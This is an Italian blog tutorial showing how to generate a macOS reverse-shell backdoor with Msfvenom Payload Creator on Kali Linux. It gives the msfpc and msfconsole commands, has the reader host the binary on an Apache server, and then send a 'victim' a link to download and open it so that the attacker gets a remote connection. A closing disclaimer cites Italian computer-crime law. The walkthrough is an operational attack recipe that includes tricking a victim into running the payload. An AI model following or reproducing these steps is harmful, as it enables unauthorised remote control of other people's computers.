In questo articolo andremo a parlare di come creare osx-shell-stageless-reverse-tcp-443.macho, una delle tante backdoor che possiamo utilizzare con Msfvenom Payload Creator; fino ad adesso ho scritto numerosi articoli riguardanti i vari tipi di backdoor che questo tool di Kali Linux ci permette di adoperare in un eventuale contesto di attacco. Per mettere in pratica quest’ultimo iniziamo con l’aprire il Payload Creator, seguendo il percorso applicazioni>strumenti di exploiting>MPC.

 

 

 

 

 

Il primo comando che digiteremo sarà:

/usr/bin/msfpc verbose loop “indirizzo ip locale”

 

 

 

 

 

 

il quale avrà il compito di creare tutte le backdoor che il tool offre, tra cui quella che interessa a noi; per trovarla dobbiamo semplicemente andare nel percorso Home e cercare tra i tanti file osx-shell-stageless-reverse-tcp-443.macho;

 

 

 

 

 

 

ricordo che per venire a conoscenza del proprio IP basterà aprire un nuovo terminale e digitarvi il comando “ifconfig”, come mostrato nelll’immagine sottostante:

 

 

 

 

 

 

Bene, ora possiamo passare all’esecuzione del secondo comando:

msfconsole -q -r ‘/root/osx-shell-stageless-reverse-tcp-443-macho.rc’

 

 

 

 

 

 

 

Una volta fatto ciò possiamo trasferire la nostra backdoor dal percorso Home al percorso computer>var>www>html

 

 

 

 

 

 

Adesso apriamo un nuovo terminale e digitiamo il comando “service apache2 start”.

 

 

 

 

 

 

Quindi arriva il momento fondamentale dell’attacco, ovvero quello di inviare un link alla vittima che succesivamente scaricherà un file che dovrà essere aperto sul dispositivo sotto attacco. Esso avrà la seguente struttura:

“nostro indirizzo ip”/osx-shell-stageless-reverse-tcp-443.macho

dove al posto di “nostro indirizzo ip”, andremo ad inserire il nostro ip ricavato già precedentemente con il comando ifconfig.

 

 

 

 

 

Il modo in cui fare tutto ciò è a vostra scelta.

Se ogni passaggio verrà svolto correttamente, il terminale di MPC in ascolto stablirà una connessione remota con il dispositivo sotto attacco; se avete problemi con i comandi potete sempre consultarli tramite il comando help da digitare sullo stesso terminale.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

 

 

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.